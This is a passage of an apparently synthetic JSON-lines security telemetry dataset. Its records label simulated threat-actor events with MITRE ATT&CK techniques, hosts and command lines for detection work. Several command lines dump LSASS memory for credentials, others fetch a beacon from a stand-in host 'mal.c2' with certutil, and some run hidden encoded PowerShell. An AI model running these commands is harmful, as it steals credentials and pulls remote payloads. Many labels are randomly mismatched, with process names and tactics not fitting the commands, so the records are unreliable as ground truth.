(DS0017)","timestamp":"2025-05-23T16:40:53.000Z","user":{"name":"azuread\\rggpcw0a5dsg","sid":"S-1-5-21-544874682-560638275-4148"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Initial Access"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20261210T123611000Z_0004743","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.191.86.178","name":"WIN-FIN-SRV-1DC1MAR09C","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4743Mustang PandaT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.49.171.11","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3858 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-03T21:45:42.000Z","user":{"name":"svc_gd10rbcr7sla","sid":"S-1-5-21-552679176-990938768-4629"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20251211T144401000Z_0004745","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.127.198.85","name":"IAM-ROLE-3QDW70C3AV","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4745APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.37.7.61","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-06T07:18:37.000Z","user":{"name":"azuread\\w8hsq02na4pi","sid":"S-1-5-21-891185374-171187414-7367"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Lateral Movement"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20261012T055624000Z_0004747","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.207.133.143","name":"DB-ORACLE-PIQJDSUZY8","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4747Scattered SpiderT1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.24.98.180","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-04-06T21:20:49.000Z","user":{"name":"azuread\\r2on6ozw9xxj","sid":"S-1-5-21-766862583-789340739-2961"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Impact","Collection","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20250531T233602000Z_0004749","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.154.247.141","name":"IAM-ROLE-FA6X1Y5EBC","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4749Scattered SpiderT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.30.153.47","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-11T12:26:40.000Z","user":{"name":"i-iwe2gewcfkrd","sid":"S-1-5-21-503821480-865703641-2737"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Lateral Movement"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250116T184231000Z_0004751","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.23.228.48","name":"WIN-FIN-SRV-OJ7AN8RYUG","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4751APT29T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.39.211.33","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-31T19:28:30.000Z","user":{"name":"CORP\\ul261jesstgu","sid":"S-1-5-21-713365230-149286055-7540"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Discovery","Initial Access"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250213T185818000Z_0004753","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.141.217.11","name":"EC2-INST-640FPFPIN3","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4753APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.126.164.139","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-01-23T13:09:09.000Z","user":{"name":"i-gwd97w9flff8","sid":"S-1-5-21-861446432-671884566-6895"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20250525T150012000Z_0004755","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.179.80.179","name":"IAM-ROLE-NTJHP96ZGS","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4755APT41T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.70.234.89","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-12-19T07:38:52.000Z","user":{"name":"i-lo6087pzdx5t","sid":"S-1-5-21-278102196-975184564-2901"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Persistence","Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20261026T181945000Z_0004757","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.141.234.141","name":"APP-WEB-DAFJ0OVO7P","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4757FIN7T1566.001"},"network":{"domain":"github.com","dst_ip":"1.155.146.184","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-05T20:27:21.000Z","user":{"name":"azuread\\qqc84dcty8cd","sid":"S-1-5-21-638204627-936148689-7576"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250122T194406000Z_0004759","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.7.148.51","name":"IAM-ROLE-86VB6RAMDF","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4759Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.94.84.2","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1263 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-31T15:12:28.000Z","user":{"name":"arn:aws:iam::o0yhlb0lvhfx","sid":"S-1-5-21-182440287-828228782-8590"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Command and Control"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20251222T154538000Z_0004761","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.97.202.24","name":"DB-ORACLE-S9AT703YIH","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4761Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.82.228.217","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-11-25T00:52:48.000Z","user":{"name":"CORP\\r9qjetz9ln7f","sid":"S-1-5-21-197392783-511218348-2161"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Credential Access","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20260602T120231000Z_0004763","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.95.200.155","name":"EC2-INST-O95MJ22ORV","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4763FIN7T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.183.125.192","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-06-09T12:41:59.000Z","user":{"name":"svc_xsx4p0tltoh5","sid":"S-1-5-21-822344350-950320299-8073"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20260226T111049000Z_0004765","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.49.180.140","name":"DB-ORACLE-YQATCMXR03","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4765UNC4841T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.12.104.242","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-01-24T14:54:56.000Z","user":{"name":"arn:aws:iam::w5z2z00vjvyx","sid":"S-1-5-21-403582972-603320442-5480"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Impact","Privilege Escalation","Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20261016T103748000Z_0004767","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.185.160.215","name":"APP-WEB-2USNROAYYV","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4767UNC4841T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.181.19.103","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-20T10:21:26.000Z","user":{"name":"svc_p4jjrw4l31i4","sid":"S-1-5-21-270954237-947174828-5894"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20260501T122256000Z_0004769","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.124.72.56","name":"EC2-INST-ET4MLPLO5A","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4769Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.156.131.158","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-19T07:56:27.000Z","user":{"name":"svc_6b8z6uatztda","sid":"S-1-5-21-855259827-640631993-8835"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using LOLBin technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20260328T142729000Z_0004771","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.138.69.37","name":"WIN-FIN-SRV-YUFKV4BWMF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4771Mustang PandaT1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.165.200.150","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3394 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-08-14T01:37:40.000Z","user":{"name":"svc_74ihexk6vlzn","sid":"S-1-5-21-795386169-626083582-9246"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Lateral Movement","Discovery"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260423T200119000Z_0004773","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.146.18.110","name":"EC2-INST-SCUPJQEUTC","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4773Mustang PandaT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.114.205.247","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 825 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-10T14:54:00.000Z","user":{"name":"arn:aws:iam::9iyarycsuuq9","sid":"S-1-5-21-748248667-968497789-7709"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Impact","Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250411T060309000Z_0004775","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.160.245.170","name":"WIN-FIN-SRV-PIQJGT8B5D","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4775UNC4841T1071.001"},"network":{"domain":"github.com","dst_ip":"1.51.25.107","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-04-26T02:50:14.000Z","user":{"name":"svc_skl2e2gfa2gp","sid":"S-1-5-21-846594887-799373782-5214"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_mustangpanda_20260724T080934000Z_0004777","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.111.121.5","name":"EC2-INST-0JS3ZLBKHL","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4777Mustang PandaT1546.003"},"network":{"domain":"github.com","dst_ip":"1.162.224.250","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2026-02-01T11:26:59.000Z","user":{"name":"i-h32pzb5lmay0","sid":"S-1-5-21-707136315-314283758-8296"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260413T011532000Z_0004779","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.93.242.63","name":"WIN-FIN-SRV-34I0B2ERFI","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4779Volt TyphoonT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.110.188.174","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"powershell.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-05T12:24:01.000Z","user":{"name":"azuread\\d63romle49jw","sid":"S-1-5-21-670901862-439581722-1956"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Exfiltration","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260216T141058000Z_0004781","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.64.38.74","name":"DB-ORACLE-TZTKLO9TDN","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4781Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.90.169.193","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-09T09:54:12.000Z","user":{"name":"arn:aws:iam::rme3hcsyxmf6","sid":"S-1-5-21-497300966-303776932-6156"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20250710T131012000Z_0004783","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.11.194.137","name":"AZURE-VM-OMO2WEYUAK","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4783FIN7T1098.004"},"network":{"domain":"github.com","dst_ip":"1.145.44.57","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3898 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-04-18T17:31:20.000Z","user":{"name":"arn:aws:iam::c0eaa1xj78el","sid":"S-1-5-21-890731596-669915394-7113"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Impact","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260420T024809000Z_0004785","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.241.4.75","name":"AZURE-VM-V9R3BT9BKS","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4785FIN7T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.2.129.62","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-12-11T00:25:33.000Z","user":{"name":"i-17k9w4c4qg8w","sid":"S-1-5-21-639380072-282075051-6804"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Collection","Command and Control"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20260729T011103000Z_0004787","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.8.188.29","name":"AZURE-VM-WFV8XEQ33P","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4787Mustang PandaT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.124.151.247","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1925 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-07-30T10:38:58.000Z","user":{"name":"azuread\\4d6jnko89mrq","sid":"S-1-5-21-131064155-319604607-3568"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Execution"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250303T182602000Z_0004789","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.131.178.84","name":"DB-ORACLE-WCOBR7CG0W","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"4789APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.168.111.163","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden 